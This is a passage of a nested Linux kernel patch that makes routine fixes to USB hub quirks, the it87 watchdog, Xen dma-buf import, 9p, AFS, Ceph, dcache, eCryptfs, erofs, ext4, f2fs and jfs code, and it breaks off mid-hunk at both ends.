++	  .driver_info = HUB_QUIRK_REDUCE_FRAME_INTR_BINTERVAL},
++	{ .match_flags = USB_DEVICE_ID_MATCH_VENDOR
++			| USB_DEVICE_ID_MATCH_PRODUCT,
++	  .idVendor = USB_VENDOR_MICROCHIP,
++	  .idProduct = USB_PRODUCT_USB4914,
++	  .driver_info = HUB_QUIRK_REDUCE_FRAME_INTR_BINTERVAL},
++	{ .match_flags = USB_DEVICE_ID_MATCH_VENDOR
++			| USB_DEVICE_ID_MATCH_PRODUCT,
++	  .idVendor = USB_VENDOR_MICROCHIP,
++	  .idProduct = USB_PRODUCT_USB4915,
++	  .driver_info = HUB_QUIRK_REDUCE_FRAME_INTR_BINTERVAL},
+     { .match_flags = USB_DEVICE_ID_MATCH_DEV_CLASS,
+       .bDeviceClass = USB_CLASS_HUB},
+     { .match_flags = USB_DEVICE_ID_MATCH_INT_CLASS,
+diff --git a/drivers/watchdog/it87_wdt.c b/drivers/watchdog/it87_wdt.c
+index bb11229093966..843f9f8e39177 100644
+--- a/drivers/watchdog/it87_wdt.c
++++ b/drivers/watchdog/it87_wdt.c
+@@ -255,6 +255,7 @@ static struct watchdog_device wdt_dev = {
+ static int __init it87_wdt_init(void)
+ {
+ 	u8  chip_rev;
++	u8 ctrl;
+ 	int rc;
+ 
+ 	rc = superio_enter();
+@@ -313,7 +314,18 @@ static int __init it87_wdt_init(void)
+ 
+ 	superio_select(GPIO);
+ 	superio_outb(WDT_TOV1, WDTCFG);
+-	superio_outb(0x00, WDTCTRL);
++
++	switch (chip_type) {
++	case IT8784_ID:
++	case IT8786_ID:
++		ctrl = superio_inb(WDTCTRL);
++		ctrl &= 0x08;
++		superio_outb(ctrl, WDTCTRL);
++		break;
++	default:
++		superio_outb(0x00, WDTCTRL);
++	}
++
+ 	superio_exit();
+ 
+ 	if (timeout < 1 || timeout > max_units * 60) {
+diff --git a/drivers/xen/gntdev-dmabuf.c b/drivers/xen/gntdev-dmabuf.c
+index 940e5e9e8a54a..335451309566a 100644
+--- a/drivers/xen/gntdev-dmabuf.c
++++ b/drivers/xen/gntdev-dmabuf.c
+@@ -11,6 +11,7 @@
+ #include <linux/kernel.h>
+ #include <linux/errno.h>
+ #include <linux/dma-buf.h>
++#include <linux/dma-direct.h>
+ #include <linux/slab.h>
+ #include <linux/types.h>
+ #include <linux/uaccess.h>
+@@ -50,7 +51,7 @@ struct gntdev_dmabuf {
+ 
+ 	/* Number of pages this buffer has. */
+ 	int nr_pages;
+-	/* Pages of this buffer. */
++	/* Pages of this buffer (only for dma-buf export). */
+ 	struct page **pages;
+ };
+ 
+@@ -484,7 +485,7 @@ out:
+ /* DMA buffer import support. */
+ 
+ static int
+-dmabuf_imp_grant_foreign_access(struct page **pages, u32 *refs,
++dmabuf_imp_grant_foreign_access(unsigned long *gfns, u32 *refs,
+ 				int count, int domid)
+ {
+ 	grant_ref_t priv_gref_head;
+@@ -507,7 +508,7 @@ dmabuf_imp_grant_foreign_access(struct page **pages, u32 *refs,
+ 		}
+ 
+ 		gnttab_grant_foreign_access_ref(cur_ref, domid,
+-						xen_page_to_gfn(pages[i]), 0);
++						gfns[i], 0);
+ 		refs[i] = cur_ref;
+ 	}
+ 
+@@ -529,7 +530,6 @@ static void dmabuf_imp_end_foreign_access(u32 *refs, int count)
+ 
+ static void dmabuf_imp_free_storage(struct gntdev_dmabuf *gntdev_dmabuf)
+ {
+-	kfree(gntdev_dmabuf->pages);
+ 	kfree(gntdev_dmabuf->u.imp.refs);
+ 	kfree(gntdev_dmabuf);
+ }
+@@ -549,12 +549,6 @@ static struct gntdev_dmabuf *dmabuf_imp_alloc_storage(int count)
+ 	if (!gntdev_dmabuf->u.imp.refs)
+ 		goto fail;
+ 
+-	gntdev_dmabuf->pages = kcalloc(count,
+-				       sizeof(gntdev_dmabuf->pages[0]),
+-				       GFP_KERNEL);
+-	if (!gntdev_dmabuf->pages)
+-		goto fail;
+-
+ 	gntdev_dmabuf->nr_pages = count;
+ 
+ 	for (i = 0; i < count; i++)
+@@ -576,7 +570,8 @@ dmabuf_imp_to_refs(struct gntdev_dmabuf_priv *priv, struct device *dev,
+ 	struct dma_buf *dma_buf;
+ 	struct dma_buf_attachment *attach;
+ 	struct sg_table *sgt;
+-	struct sg_page_iter sg_iter;
++	struct sg_dma_page_iter sg_iter;
++	unsigned long *gfns;
+ 	int i;
+ 
+ 	dma_buf = dma_buf_get(fd);
+@@ -624,26 +619,31 @@ dmabuf_imp_to_refs(struct gntdev_dmabuf_priv *priv, struct device *dev,
+ 
+ 	gntdev_dmabuf->u.imp.sgt = sgt;
+ 
+-	/* Now convert sgt to array of pages and check for page validity. */
++	gfns = kcalloc(count, sizeof(*gfns), GFP_KERNEL);
++	if (!gfns) {
++		ret = ERR_PTR(-ENOMEM);
++		goto fail_unmap;
++	}
++
++	/*
++	 * Now convert sgt to array of gfns without accessing underlying pages.
++	 * It is not allowed to access the underlying struct page of an sg table
++	 * exported by DMA-buf, but since we deal with special Xen dma device here
++	 * (not a normal physical one) look at the dma addresses in the sg table
++	 * and then calculate gfns directly from them.
++	 */
+ 	i = 0;
+-	for_each_sgtable_page(sgt, &sg_iter, 0) {
+-		struct page *page = sg_page_iter_page(&sg_iter);
+-		/*
+-		 * Check if page is valid: this can happen if we are given
+-		 * a page from VRAM or other resources which are not backed
+-		 * by a struct page.
+-		 */
+-		if (!pfn_valid(page_to_pfn(page))) {
+-			ret = ERR_PTR(-EINVAL);
+-			goto fail_unmap;
+-		}
++	for_each_sgtable_dma_page(sgt, &sg_iter, 0) {
++		dma_addr_t addr = sg_page_iter_dma_address(&sg_iter);
++		unsigned long pfn = bfn_to_pfn(XEN_PFN_DOWN(dma_to_phys(dev, addr)));
+ 
+-		gntdev_dmabuf->pages[i++] = page;
++		gfns[i++] = pfn_to_gfn(pfn);
+ 	}
+ 
+-	ret = ERR_PTR(dmabuf_imp_grant_foreign_access(gntdev_dmabuf->pages,
++	ret = ERR_PTR(dmabuf_imp_grant_foreign_access(gfns,
+ 						      gntdev_dmabuf->u.imp.refs,
+ 						      count, domid));
++	kfree(gfns);
+ 	if (IS_ERR(ret))
+ 		goto fail_end_access;
+ 
+diff --git a/fs/9p/v9fs_vfs.h b/fs/9p/v9fs_vfs.h
+index bc417da7e9c1d..633fe4f527b84 100644
+--- a/fs/9p/v9fs_vfs.h
++++ b/fs/9p/v9fs_vfs.h
+@@ -46,6 +46,7 @@ struct inode *v9fs_alloc_inode(struct super_block *sb);
+ void v9fs_free_inode(struct inode *inode);
+ struct inode *v9fs_get_inode(struct super_block *sb, umode_t mode,
+ 			     dev_t rdev);
++void v9fs_set_netfs_context(struct inode *inode);
+ int v9fs_init_inode(struct v9fs_session_info *v9ses,
+ 		    struct inode *inode, umode_t mode, dev_t rdev);
+ void v9fs_evict_inode(struct inode *inode);
+diff --git a/fs/9p/vfs_inode.c b/fs/9p/vfs_inode.c
+index 4d1a4a8d92772..5e2657c1dbbe6 100644
+--- a/fs/9p/vfs_inode.c
++++ b/fs/9p/vfs_inode.c
+@@ -250,7 +250,7 @@ void v9fs_free_inode(struct inode *inode)
+ /*
+  * Set parameters for the netfs library
+  */
+-static void v9fs_set_netfs_context(struct inode *inode)
++void v9fs_set_netfs_context(struct inode *inode)
+ {
+ 	struct v9fs_inode *v9inode = V9FS_I(inode);
+ 	netfs_inode_init(&v9inode->netfs, &v9fs_req_ops);
+@@ -344,8 +344,6 @@ int v9fs_init_inode(struct v9fs_session_info *v9ses,
+ 		err = -EINVAL;
+ 		goto error;
+ 	}
+-
+-	v9fs_set_netfs_context(inode);
+ error:
+ 	return err;
+ 
+@@ -377,6 +375,7 @@ struct inode *v9fs_get_inode(struct super_block *sb, umode_t mode, dev_t rdev)
+ 		iput(inode);
+ 		return ERR_PTR(err);
+ 	}
++	v9fs_set_netfs_context(inode);
+ 	return inode;
+ }
+ 
+@@ -479,6 +478,7 @@ static struct inode *v9fs_qid_iget(struct super_block *sb,
+ 		goto error;
+ 
+ 	v9fs_stat2inode(st, inode, sb, 0);
++	v9fs_set_netfs_context(inode);
+ 	v9fs_cache_inode_get_cookie(inode);
+ 	unlock_new_inode(inode);
+ 	return inode;
+diff --git a/fs/9p/vfs_inode_dotl.c b/fs/9p/vfs_inode_dotl.c
+index 5cfa4b4f070f4..e15ad46833e05 100644
+--- a/fs/9p/vfs_inode_dotl.c
++++ b/fs/9p/vfs_inode_dotl.c
+@@ -130,6 +130,7 @@ static struct inode *v9fs_qid_iget_dotl(struct super_block *sb,
+ 		goto error;
+ 
+ 	v9fs_stat2inode_dotl(st, inode, 0);
++	v9fs_set_netfs_context(inode);
+ 	v9fs_cache_inode_get_cookie(inode);
+ 	retval = v9fs_get_acl(inode, fid);
+ 	if (retval)
+diff --git a/fs/afs/callback.c b/fs/afs/callback.c
+index a484fa6428081..90f9b2a46ff48 100644
+--- a/fs/afs/callback.c
++++ b/fs/afs/callback.c
+@@ -110,13 +110,14 @@ static struct afs_volume *afs_lookup_volume_rcu(struct afs_cell *cell,
+ {
+ 	struct afs_volume *volume = NULL;
+ 	struct rb_node *p;
+-	int seq = 0;
++	int seq = 1;
+ 
+ 	do {
+ 		/* Unfortunately, rbtree walking doesn't give reliable results
+ 		 * under just the RCU read lock, so we have to check for
+ 		 * changes.
+ 		 */
++		seq++; /* 2 on the 1st/lockless path, otherwise odd */
+ 		read_seqbegin_or_lock(&cell->volume_lock, &seq);
+ 
+ 		p = rcu_dereference_raw(cell->volumes.rb_node);
+diff --git a/fs/afs/server.c b/fs/afs/server.c
+index b5237206eac3e..0bd2f5ba6900c 100644
+--- a/fs/afs/server.c
++++ b/fs/afs/server.c
+@@ -27,7 +27,7 @@ struct afs_server *afs_find_server(struct afs_net *net,
+ 	const struct afs_addr_list *alist;
+ 	struct afs_server *server = NULL;
+ 	unsigned int i;
+-	int seq = 0, diff;
++	int seq = 1, diff;
+ 
+ 	rcu_read_lock();
+ 
+@@ -35,6 +35,7 @@ struct afs_server *afs_find_server(struct afs_net *net,
+ 		if (server)
+ 			afs_unuse_server_notime(net, server, afs_server_trace_put_find_rsq);
+ 		server = NULL;
++		seq++; /* 2 on the 1st/lockless path, otherwise odd */
+ 		read_seqbegin_or_lock(&net->fs_addr_lock, &seq);
+ 
+ 		if (srx->transport.family == AF_INET6) {
+@@ -90,7 +91,7 @@ struct afs_server *afs_find_server_by_uuid(struct afs_net *net, const uuid_t *uu
+ {
+ 	struct afs_server *server = NULL;
+ 	struct rb_node *p;
+-	int diff, seq = 0;
++	int diff, seq = 1;
+ 
+ 	_enter("%pU", uuid);
+ 
+@@ -102,7 +103,7 @@ struct afs_server *afs_find_server_by_uuid(struct afs_net *net, const uuid_t *uu
+ 		if (server)
+ 			afs_unuse_server(net, server, afs_server_trace_put_uuid_rsq);
+ 		server = NULL;
+-
++		seq++; /* 2 on the 1st/lockless path, otherwise odd */
+ 		read_seqbegin_or_lock(&net->fs_lock, &seq);
+ 
+ 		p = net->fs_servers.rb_node;
+diff --git a/fs/ceph/caps.c b/fs/ceph/caps.c
+index 36052a3626830..111938a6307e6 100644
+--- a/fs/ceph/caps.c
++++ b/fs/ceph/caps.c
+@@ -4597,12 +4597,14 @@ int ceph_encode_dentry_release(void **p, struct dentry *dentry,
+ 			       struct inode *dir,
+ 			       int mds, int drop, int unless)
+ {
+-	struct dentry *parent = NULL;
+ 	struct ceph_mds_request_release *rel = *p;
+ 	struct ceph_dentry_info *di = ceph_dentry(dentry);
+ 	int force = 0;
+ 	int ret;
+ 
++	/* This shouldn't happen */
++	BUG_ON(!dir);
++
+ 	/*
+ 	 * force an record for the directory caps if we have a dentry lease.
+ 	 * this is racy (can't take i_ceph_lock and d_lock together), but it
+@@ -4612,14 +4614,9 @@ int ceph_encode_dentry_release(void **p, struct dentry *dentry,
+ 	spin_lock(&dentry->d_lock);
+ 	if (di->lease_session && di->lease_session->s_mds == mds)
+ 		force = 1;
+-	if (!dir) {
+-		parent = dget(dentry->d_parent);
+-		dir = d_inode(parent);
+-	}
+ 	spin_unlock(&dentry->d_lock);
+ 
+ 	ret = ceph_encode_inode_release(p, dir, mds, drop, unless, force);
+-	dput(parent);
+ 
+ 	spin_lock(&dentry->d_lock);
+ 	if (ret && di->lease_session && di->lease_session->s_mds == mds) {
+diff --git a/fs/ceph/mds_client.c b/fs/ceph/mds_client.c
+index 82874be945248..da9fcf48ab6c0 100644
+--- a/fs/ceph/mds_client.c
++++ b/fs/ceph/mds_client.c
+@@ -3650,11 +3650,11 @@ static void handle_session(struct ceph_mds_session *session,
+ 		if (session->s_state == CEPH_MDS_SESSION_RECONNECTING)
+ 			pr_info("mds%d reconnect success\n", session->s_mds);
+ 
++		session->s_features = features;
+ 		if (session->s_state == CEPH_MDS_SESSION_OPEN) {
+ 			pr_notice("mds%d is already opened\n", session->s_mds);
+ 		} else {
+ 			session->s_state = CEPH_MDS_SESSION_OPEN;
+-			session->s_features = features;
+ 			renewed_caps(mdsc, session, 0);
+ 			if (test_bit(CEPHFS_FEATURE_METRIC_COLLECT,
+ 				     &session->s_features))
+diff --git a/fs/ceph/quota.c b/fs/ceph/quota.c
+index f7fcf7f08ec64..ca4932e6f71bf 100644
+--- a/fs/ceph/quota.c
++++ b/fs/ceph/quota.c
+@@ -194,10 +194,10 @@ void ceph_cleanup_quotarealms_inodes(struct ceph_mds_client *mdsc)
+ }
+ 
+ /*
+- * This function walks through the snaprealm for an inode and returns the
+- * ceph_snap_realm for the first snaprealm that has quotas set (max_files,
++ * This function walks through the snaprealm for an inode and set the
++ * realmp with the first snaprealm that has quotas set (max_files,
+  * max_bytes, or any, depending on the 'which_quota' argument).  If the root is
+- * reached, return the root ceph_snap_realm instead.
++ * reached, set the realmp with the root ceph_snap_realm instead.
+  *
+  * Note that the caller is responsible for calling ceph_put_snap_realm() on the
+  * returned realm.
+@@ -208,18 +208,19 @@ void ceph_cleanup_quotarealms_inodes(struct ceph_mds_client *mdsc)
+  * this function will return -EAGAIN; otherwise, the snaprealms walk-through
+  * will be restarted.
+  */
+-static struct ceph_snap_realm *get_quota_realm(struct ceph_mds_client *mdsc,
+-					       struct inode *inode,
+-					       enum quota_get_realm which_quota,
+-					       bool retry)
++static int get_quota_realm(struct ceph_mds_client *mdsc, struct inode *inode,
++			   enum quota_get_realm which_quota,
++			   struct ceph_snap_realm **realmp, bool retry)
+ {
+ 	struct ceph_inode_info *ci = NULL;
+ 	struct ceph_snap_realm *realm, *next;
+ 	struct inode *in;
+ 	bool has_quota;
+ 
++	if (realmp)
++		*realmp = NULL;
+ 	if (ceph_snap(inode) != CEPH_NOSNAP)
+-		return NULL;
++		return 0;
+ 
+ restart:
+ 	realm = ceph_inode(inode)->i_snap_realm;
+@@ -245,7 +246,7 @@ restart:
+ 				break;
+ 			ceph_put_snap_realm(mdsc, realm);
+ 			if (!retry)
+-				return ERR_PTR(-EAGAIN);
++				return -EAGAIN;
+ 			goto restart;
+ 		}
+ 
+@@ -254,8 +255,11 @@ restart:
+ 		iput(in);
+ 
+ 		next = realm->parent;
+-		if (has_quota || !next)
+-		       return realm;
++		if (has_quota || !next) {
++			if (realmp)
++				*realmp = realm;
++			return 0;
++		}
+ 
+ 		ceph_get_snap_realm(mdsc, next);
+ 		ceph_put_snap_realm(mdsc, realm);
+@@ -264,7 +268,7 @@ restart:
+ 	if (realm)
+ 		ceph_put_snap_realm(mdsc, realm);
+ 
+-	return NULL;
++	return 0;
+ }
+ 
+ bool ceph_quota_is_same_realm(struct inode *old, struct inode *new)
+@@ -272,6 +276,7 @@ bool ceph_quota_is_same_realm(struct inode *old, struct inode *new)
+ 	struct ceph_mds_client *mdsc = ceph_sb_to_mdsc(old->i_sb);
+ 	struct ceph_snap_realm *old_realm, *new_realm;
+ 	bool is_same;
++	int ret;
+ 
+ restart:
+ 	/*
+@@ -281,9 +286,9 @@ restart:
+ 	 * dropped and we can then restart the whole operation.
+ 	 */
+ 	down_read(&mdsc->snap_rwsem);
+-	old_realm = get_quota_realm(mdsc, old, QUOTA_GET_ANY, true);
+-	new_realm = get_quota_realm(mdsc, new, QUOTA_GET_ANY, false);
+-	if (PTR_ERR(new_realm) == -EAGAIN) {
++	get_quota_realm(mdsc, old, QUOTA_GET_ANY, &old_realm, true);
++	ret = get_quota_realm(mdsc, new, QUOTA_GET_ANY, &new_realm, false);
++	if (ret == -EAGAIN) {
+ 		up_read(&mdsc->snap_rwsem);
+ 		if (old_realm)
+ 			ceph_put_snap_realm(mdsc, old_realm);
+@@ -485,8 +490,8 @@ bool ceph_quota_update_statfs(struct ceph_fs_client *fsc, struct kstatfs *buf)
+ 	bool is_updated = false;
+ 
+ 	down_read(&mdsc->snap_rwsem);
+-	realm = get_quota_realm(mdsc, d_inode(fsc->sb->s_root),
+-				QUOTA_GET_MAX_BYTES, true);
++	get_quota_realm(mdsc, d_inode(fsc->sb->s_root), QUOTA_GET_MAX_BYTES,
++			&realm, true);
+ 	up_read(&mdsc->snap_rwsem);
+ 	if (!realm)
+ 		return false;
+diff --git a/fs/dcache.c b/fs/dcache.c
+index 52e6d5fdab6bd..b09bc88dbbec7 100644
+--- a/fs/dcache.c
++++ b/fs/dcache.c
+@@ -787,12 +787,12 @@ static inline bool fast_dput(struct dentry *dentry)
+ 	 */
+ 	if (unlikely(ret < 0)) {
+ 		spin_lock(&dentry->d_lock);
+-		if (dentry->d_lockref.count > 1) {
+-			dentry->d_lockref.count--;
++		if (WARN_ON_ONCE(dentry->d_lockref.count <= 0)) {
+ 			spin_unlock(&dentry->d_lock);
+ 			return true;
+ 		}
+-		return false;
++		dentry->d_lockref.count--;
++		goto locked;
+ 	}
+ 
+ 	/*
+@@ -850,6 +850,7 @@ static inline bool fast_dput(struct dentry *dentry)
+ 	 * else could have killed it and marked it dead. Either way, we
+ 	 * don't need to do anything else.
+ 	 */
++locked:
+ 	if (dentry->d_lockref.count) {
+ 		spin_unlock(&dentry->d_lock);
+ 		return true;
+diff --git a/fs/ecryptfs/inode.c b/fs/ecryptfs/inode.c
+index c214fe0981bdc..55340ac61456c 100644
+--- a/fs/ecryptfs/inode.c
++++ b/fs/ecryptfs/inode.c
+@@ -76,6 +76,14 @@ static struct inode *__ecryptfs_get_inode(struct inode *lower_inode,
+ 
+ 	if (lower_inode->i_sb != ecryptfs_superblock_to_lower(sb))
+ 		return ERR_PTR(-EXDEV);
++
++	/* Reject dealing with casefold directories. */
++	if (IS_CASEFOLDED(lower_inode)) {
++		pr_err_ratelimited("%s: Can't handle casefolded directory.\n",
++				   __func__);
++		return ERR_PTR(-EREMOTE);
++	}
++
+ 	if (!igrab(lower_inode))
+ 		return ERR_PTR(-ESTALE);
+ 	inode = iget5_locked(sb, (unsigned long)lower_inode,
+diff --git a/fs/erofs/zdata.c b/fs/erofs/zdata.c
+index cf9a2fa7f55d2..47e71964eeff8 100644
+--- a/fs/erofs/zdata.c
++++ b/fs/erofs/zdata.c
+@@ -652,7 +652,6 @@ static int z_erofs_register_pcluster(struct z_erofs_decompress_frontend *fe)
+ 
+ 	if (ztailpacking) {
+ 		pcl->obj.index = 0;	/* which indicates ztailpacking */
+-		pcl->pageofs_in = erofs_blkoff(map->m_pa);
+ 		pcl->tailpacking_size = map->m_plen;
+ 	} else {
+ 		pcl->obj.index = map->m_pa >> PAGE_SHIFT;
+@@ -852,6 +851,7 @@ repeat:
+ 		get_page(fe->map.buf.page);
+ 		WRITE_ONCE(fe->pcl->compressed_bvecs[0].page,
+ 			   fe->map.buf.page);
++		fe->pcl->pageofs_in = map->m_pa & ~PAGE_MASK;
+ 		fe->mode = Z_EROFS_PCLUSTER_FOLLOWED_NOINPLACE;
+ 	} else {
+ 		/* bind cache first when cached decompression is preferred */
+diff --git a/fs/ext4/mballoc.c b/fs/ext4/mballoc.c
+index 33be702d6e380..c1515daf1def1 100644
+--- a/fs/ext4/mballoc.c
++++ b/fs/ext4/mballoc.c
+@@ -6444,13 +6444,15 @@ static int ext4_try_to_trim_range(struct super_block *sb,
+ __acquires(ext4_group_lock_ptr(sb, e4b->bd_group))
+ __releases(ext4_group_lock_ptr(sb, e4b->bd_group))
+ {
+-	ext4_grpblk_t next, count, free_count;
++	ext4_grpblk_t next, count, free_count, last, origin_start;
+ 	bool set_trimmed = false;
+ 	void *bitmap;
+ 
++	last = ext4_last_grp_cluster(sb, e4b->bd_group);
+ 	bitmap = e4b->bd_bitmap;
+-	if (start == 0 && max >= ext4_last_grp_cluster(sb, e4b->bd_group))
++	if (start == 0 && max >= last)
+ 		set_trimmed = true;
++	origin_start = start;
+ 	start = max(e4b->bd_info->bb_first_free, start);
+ 	count = 0;
+ 	free_count = 0;
+@@ -6459,7 +6461,10 @@ __releases(ext4_group_lock_ptr(sb, e4b->bd_group))
+ 		start = mb_find_next_zero_bit(bitmap, max + 1, start);
+ 		if (start > max)
+ 			break;
+-		next = mb_find_next_bit(bitmap, max + 1, start);
++
++		next = mb_find_next_bit(bitmap, last + 1, start);
++		if (origin_start == 0 && next >= last)
++			set_trimmed = true;
+ 
+ 		if ((next - start) >= minblocks) {
+ 			int ret = ext4_trim_extent(sb, start, next - start, e4b);
+diff --git a/fs/ext4/resize.c b/fs/ext4/resize.c
+index 9833ab6db117c..f2ed15af703a8 100644
+--- a/fs/ext4/resize.c
++++ b/fs/ext4/resize.c
+@@ -231,17 +231,24 @@ struct ext4_new_flex_group_data {
+ 						   in the flex group */
+ 	__u16 *bg_flags;			/* block group flags of groups
+ 						   in @groups */
++	ext4_group_t resize_bg;			/* number of allocated
++						   new_group_data */
+ 	ext4_group_t count;			/* number of groups in @groups
+ 						 */
+ };
+ 
++/*
++ * Avoiding memory allocation failures due to too many groups added each time.
++ */
++#define MAX_RESIZE_BG				16384
++
+ /*
+  * alloc_flex_gd() allocates a ext4_new_flex_group_data with size of
+  * @flexbg_size.
+  *
+  * Returns NULL on failure otherwise address of the allocated structure.
+  */
+-static struct ext4_new_flex_group_data *alloc_flex_gd(unsigned long flexbg_size)
++static struct ext4_new_flex_group_data *alloc_flex_gd(unsigned int flexbg_size)
+ {
+ 	struct ext4_new_flex_group_data *flex_gd;
+ 
+@@ -249,17 +256,18 @@ static struct ext4_new_flex_group_data *alloc_flex_gd(unsigned long flexbg_size)
+ 	if (flex_gd == NULL)
+ 		goto out3;
+ 
+-	if (flexbg_size >= UINT_MAX / sizeof(struct ext4_new_group_data))
+-		goto out2;
+-	flex_gd->count = flexbg_size;
++	if (unlikely(flexbg_size > MAX_RESIZE_BG))
++		flex_gd->resize_bg = MAX_RESIZE_BG;
++	else
++		flex_gd->resize_bg = flexbg_size;
+ 
+-	flex_gd->groups = kmalloc_array(flexbg_size,
++	flex_gd->groups = kmalloc_array(flex_gd->resize_bg,
+ 					sizeof(struct ext4_new_group_data),
+ 					GFP_NOFS);
+ 	if (flex_gd->groups == NULL)
+ 		goto out2;
+ 
+-	flex_gd->bg_flags = kmalloc_array(flexbg_size, sizeof(__u16),
++	flex_gd->bg_flags = kmalloc_array(flex_gd->resize_bg, sizeof(__u16),
+ 					  GFP_NOFS);
+ 	if (flex_gd->bg_flags == NULL)
+ 		goto out1;
+@@ -296,7 +304,7 @@ static void free_flex_gd(struct ext4_new_flex_group_data *flex_gd)
+  */
+ static int ext4_alloc_group_tables(struct super_block *sb,
+ 				struct ext4_new_flex_group_data *flex_gd,
+-				int flexbg_size)
++				unsigned int flexbg_size)
+ {
+ 	struct ext4_new_group_data *group_data = flex_gd->groups;
+ 	ext4_fsblk_t start_blk;
+@@ -397,12 +405,12 @@ next_group:
+ 		group = group_data[0].group;
+ 
+ 		printk(KERN_DEBUG "EXT4-fs: adding a flex group with "
+-		       "%d groups, flexbg size is %d:\n", flex_gd->count,
++		       "%u groups, flexbg size is %u:\n", flex_gd->count,
+ 		       flexbg_size);
+ 
+ 		for (i = 0; i < flex_gd->count; i++) {
+ 			ext4_debug(
+-			       "adding %s group %u: %u blocks (%d free, %d mdata blocks)\n",
++			       "adding %s group %u: %u blocks (%u free, %u mdata blocks)\n",
+ 			       ext4_bg_has_super(sb, group + i) ? "normal" :
+ 			       "no-super", group + i,
+ 			       group_data[i].blocks_count,
+@@ -1623,8 +1631,7 @@ exit:
+ 
+ static int ext4_setup_next_flex_gd(struct super_block *sb,
+ 				    struct ext4_new_flex_group_data *flex_gd,
+-				    ext4_fsblk_t n_blocks_count,
+-				    unsigned long flexbg_size)
++				    ext4_fsblk_t n_blocks_count)
+ {
+ 	struct ext4_sb_info *sbi = EXT4_SB(sb);
+ 	struct ext4_super_block *es = sbi->s_es;
+@@ -1648,7 +1655,7 @@ static int ext4_setup_next_flex_gd(struct super_block *sb,
+ 	BUG_ON(last);
+ 	ext4_get_group_no_and_offset(sb, n_blocks_count - 1, &n_group, &last);
+ 
+-	last_group = group | (flexbg_size - 1);
++	last_group = group | (flex_gd->resize_bg - 1);
+ 	if (last_group > n_group)
+ 		last_group = n_group;
+ 
+@@ -2010,8 +2017,9 @@ int ext4_resize_fs(struct super_block *sb, ext4_fsblk_t n_blocks_count)
+ 	ext4_fsblk_t o_blocks_count;
+ 	ext4_fsblk_t n_blocks_count_retry = 0;
+ 	unsigned long last_update_time = 0;
+-	int err = 0, flexbg_size = 1 << sbi->s_log_groups_per_flex;
++	int err = 0;
+ 	int meta_bg;
++	unsigned int flexbg_size = ext4_flex_bg_size(sbi);
+ 
+ 	/* See if the device is actually as big as what was requested */
+ 	bh = ext4_sb_bread(sb, n_blocks_count - 1, 0);
+@@ -2152,8 +2160,7 @@ retry:
+ 	/* Add flex groups. Note that a regular group is a
+ 	 * flex group with 1 group.
+ 	 */
+-	while (ext4_setup_next_flex_gd(sb, flex_gd, n_blocks_count,
+-					      flexbg_size)) {
++	while (ext4_setup_next_flex_gd(sb, flex_gd, n_blocks_count)) {
+ 		if (time_is_before_jiffies(last_update_time + HZ * 10)) {
+ 			if (last_update_time)
+ 				ext4_msg(sb, KERN_INFO,
+diff --git a/fs/f2fs/compress.c b/fs/f2fs/compress.c
+index 4cb58e8d699e2..3d9f6495a4db4 100644
+--- a/fs/f2fs/compress.c
++++ b/fs/f2fs/compress.c
+@@ -1026,8 +1026,10 @@ static void set_cluster_dirty(struct compress_ctx *cc)
+ 	int i;
+ 
+ 	for (i = 0; i < cc->cluster_size; i++)
+-		if (cc->rpages[i])
++		if (cc->rpages[i]) {
+ 			set_page_dirty(cc->rpages[i]);
++			set_page_private_gcing(cc->rpages[i]);
++		}
+ }
+ 
+ static int prepare_compress_overwrite(struct compress_ctx *cc,
+diff --git a/fs/f2fs/file.c b/fs/f2fs/file.c
+index fd22854dbeaea..46e4960a9dcf7 100644
+--- a/fs/f2fs/file.c
++++ b/fs/f2fs/file.c
+@@ -1326,6 +1326,7 @@ static int __clone_blkaddrs(struct inode *src_inode, struct inode *dst_inode,
+ 			}
+ 			memcpy_page(pdst, 0, psrc, 0, PAGE_SIZE);
+ 			set_page_dirty(pdst);
++			set_page_private_gcing(pdst);
+ 			f2fs_put_page(pdst, 1);
+ 			f2fs_put_page(psrc, 1);
+ 
+@@ -4037,6 +4038,7 @@ static int redirty_blocks(struct inode *inode, pgoff_t page_idx, int len)
+ 		f2fs_bug_on(F2FS_I_SB(inode), !page);
+ 
+ 		set_page_dirty(page);
++		set_page_private_gcing(page);
+ 		f2fs_put_page(page, 1);
+ 		f2fs_put_page(page, 0);
+ 	}
+diff --git a/fs/f2fs/recovery.c b/fs/f2fs/recovery.c
+index dea95b48b647d..53a6487f91e44 100644
+--- a/fs/f2fs/recovery.c
++++ b/fs/f2fs/recovery.c
+@@ -683,7 +683,16 @@ retry_dn:
+ 		 */
+ 		if (dest == NEW_ADDR) {
+ 			f2fs_truncate_data_blocks_range(&dn, 1);
+-			f2fs_reserve_new_block(&dn);
++			do {
++				err = f2fs_reserve_new_block(&dn);
++				if (err == -ENOSPC) {
++					f2fs_bug_on(sbi, 1);
++					break;
++				}
++			} while (err &&
++				IS_ENABLED(CONFIG_F2FS_FAULT_INJECTION));
++			if (err)
++				goto err;
+ 			continue;
+ 		}
+ 
+@@ -691,12 +700,14 @@ retry_dn:
+ 		if (f2fs_is_valid_blkaddr(sbi, dest, META_POR)) {
+ 
+ 			if (src == NULL_ADDR) {
+-				err = f2fs_reserve_new_block(&dn);
+-				while (err &&
+-				       IS_ENABLED(CONFIG_F2FS_FAULT_INJECTION))
++				do {
+ 					err = f2fs_reserve_new_block(&dn);
+-				/* We should not get -ENOSPC */
+-				f2fs_bug_on(sbi, err);
++					if (err == -ENOSPC) {
++						f2fs_bug_on(sbi, 1);
++						break;
++					}
++				} while (err &&
++					IS_ENABLED(CONFIG_F2FS_FAULT_INJECTION));
+ 				if (err)
+ 					goto err;
+ 			}
+@@ -887,6 +898,8 @@ skip:
+ 	if (!err && fix_curseg_write_pointer && !f2fs_readonly(sbi->sb) &&
+ 			f2fs_sb_has_blkzoned(sbi)) {
+ 		err = f2fs_fix_curseg_write_pointer(sbi);
++		if (!err)
++			err = f2fs_check_write_pointer(sbi);
+ 		ret = err;
+ 	}
+ 
+diff --git a/fs/jfs/jfs_dmap.c b/fs/jfs/jfs_dmap.c
+index 4d56f6081a5d2..4462274e325ac 100644
+--- a/fs/jfs/jfs_dmap.c
++++ b/fs/jfs/jfs_dmap.c
+@@ -63,10 +63,10 @@
+  */
+ static void dbAllocBits(struct bmap * bmp, struct dmap * dp, s64 blkno,
+ 			int nblocks);
+-static void dbSplit(dmtree_t * tp, int leafno, int splitsz, int newval);
+-static int dbBackSplit(dmtree_t * tp, int leafno);
+-static int dbJoin(dmtree_t * tp, int leafno, int newval);
+-static void dbAdjTree(dmtree_t * tp, int leafno, int newval);
